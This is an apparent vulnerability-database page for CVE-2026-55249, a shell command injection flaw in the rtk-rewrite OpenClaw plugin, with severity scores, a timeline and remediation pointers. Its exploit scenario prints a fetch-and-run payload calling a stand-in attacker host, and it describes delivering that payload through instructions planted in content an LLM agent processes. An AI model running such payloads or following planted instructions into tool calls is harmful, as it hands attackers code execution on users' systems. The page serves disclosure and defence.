Skip to main content

rtk-rewrite CVE-2026-55249

| EUVDEUVD-2026-38571 HIGH
OS Command Injection (CWE-78)
2026-06-23 GitHub_M
8.8
CVSS 3.1 · NVD
Share

Severity by source

Vendor (GitHub_M) PRIMARY
MEDIUM
qualitative
NVD
8.8 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Injected input reaches the tool remotely with no auth (PR:N) but must be forwarded by an agent/operator workflow (UI:R); shell execution yields full C/I/A within the process (S:U).

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

6
Analysis Updated
Jul 01, 2026 - 18:58 vuln.today
v3 (cvss_changed)
Analysis Updated
Jul 01, 2026 - 18:58 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jul 01, 2026 - 18:52 vuln.today
cvss_changed
Severity Changed
Jul 01, 2026 - 18:52 NVD
MEDIUM HIGH
CVSS changed
Jul 01, 2026 - 18:52 NVD
6.3 (MEDIUM) 8.8 (HIGH)
Analysis Generated
Jun 23, 2026 - 19:21 vuln.today

DescriptionNVD

@rtk-ai/rtk-rewrite transparently rewrites shell commands executed via OpenClaw's exec tool to their RTK equivalents. In 1.0.0, the @rtk-ai/rtk-rewrite OpenClaw plugin passes attacker-controlled input directly into a shell-backed execSync() template string without shell-safe escaping. JSON.stringify() wraps the value in double quotes and escapes inner double-quotes and backslashes, but leaves $() and backtick shell metacharacters untouched. Because execSync delegates execution to /bin/sh -c, the shell expands $(...) substitutions even inside double-quoted strings, causing the injected subcommand to execute before rtk is invoked. An attacker who can influence the exec tool's command parameter (e.g., via an LLM agent prompt or gateway/tool-call input) achieves arbitrary OS command execution with the privileges of the plugin/gateway process.

AnalysisAI

Arbitrary OS command execution in the @rtk-ai/rtk-rewrite 1.0.0 OpenClaw plugin allows an attacker who can influence the exec tool's command parameter - for example through an LLM agent prompt or gateway/tool-call input - to run commands with the privileges of the plugin/gateway process. The flaw stems from unsanitized input being interpolated into a shell-backed execSync() template that /bin/sh -c expands, letting $() and backtick substitutions fire before rtk runs. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft command parameter with $() payload
Delivery
Inject via LLM prompt or gateway tool-call
Exploit
rtk-rewrite builds execSync template
Execution
/bin/sh -c expands substitution
Persist
Subcommand runs as plugin process
Impact
Arbitrary OS command execution

Vulnerability AssessmentAI

Exploitation Exploitation requires that the attacker can influence the OpenClaw exec tool's command parameter passed to the vulnerable @rtk-ai/rtk-rewrite 1.0.0 plugin - concretely, via an LLM agent prompt that the agent turns into an exec call, or via direct gateway/tool-call input - and that the value contains shell command-substitution syntax ($() or backticks), which JSON.stringify() does not escape before execSync runs /bin/sh -c. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score is 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H): network reachable, low complexity, no privileges, but requiring user interaction, with full confidentiality, integrity, and availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker plants a crafted instruction in content an LLM agent will process (or submits it directly to a gateway/tool-call), causing the agent to invoke OpenClaw's exec tool with a command parameter such as "ls $(curl attacker.example/x|sh)". When rtk-rewrite builds its execSync() template and /bin/sh -c evaluates it, the $(...) substitution runs first and executes the attacker's payload with the plugin process's privileges. …
Remediation Consult the vendor advisory GHSA-fqgj-m2gp-mr3q (https://github.com/rtk-ai/rtk/security/advisories/GHSA-fqgj-m2gp-mr3q) and upgrade to a fixed release once published; no exact fixed version is stated in the available data, so confirm the patched version directly from that advisory before deploying. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all systems running @rtk-ai/rtk-rewrite 1.0.0 and isolate from untrusted network sources. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-55249 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy